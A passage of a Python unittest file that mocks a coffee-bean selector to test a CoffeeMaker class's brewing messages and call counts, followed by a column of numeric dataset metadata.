coffee_select_Mock = MagicMock(AbstractCoffeeSelect)
coffee_select_Mock.get_beans.return_value = 1
coffee_select_Mock.grind_beans.return_value = False
maker = CoffeeMaker(coffee_select_Mock)
coffee = maker.making_coffee()
assert coffee == "No ground coffee available"
# called with zero arguments
coffee_select_Mock.get_beans.assert_called_with()
# was called once with zero arguments
coffee_select_Mock.get_beans.assert_called_once_with()
# was it called at least once
coffee_select_Mock.get_beans.assert_called()
# was called once only
coffee_select_Mock.get_beans.assert_called_once()
coffee_select_Mock.grind_beans.assert_called_once()
def test_the_sweat_taste_of_coffee(self):
beans = 4
coffee_select_Mock = MagicMock(AbstractCoffeeSelect)
coffee_select_Mock.get_beans.return_value = beans
coffee_select_Mock.grind_beans.return_value = True
maker = CoffeeMaker(coffee_select_Mock)
coffee = maker.making_coffee()
assert coffee == "Coffee has now been brewed with {} beans".format(beans)
# called with zero arguments
coffee_select_Mock.get_beans.assert_called_with()
# was called once with zero arguments
coffee_select_Mock.get_beans.assert_called_once_with()
# was it called at least once
coffee_select_Mock.get_beans.assert_called()
# was called once only
coffee_select_Mock.get_beans.assert_called_once()
coffee_select_Mock.grind_beans.assert_called_once()
if __name__ == '__main__':
unittest.main()
| 36.507042
| 81
| 0.716821
| 330
| 2,592
| 5.236364
| 0.166667
| 0.180556
| 0.240741
| 0.164931
| 0.84375
| 0.84375
| 0.835648
| 0.814236
| 0.814236
| 0.814236
| 0
| 0.001488
| 0.222222
| 2,592
| 70
| 82
| 37.028571
| 0.855655
| 0.129244
| 0
| 0.581395
| 0
| 0
| 0.041444
| 0
| 0
| 0
| 0
| 0
| 0.395349
| 1
| 0.069767
| false
| 0
| 0.093023
| 0
| 0.186047
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.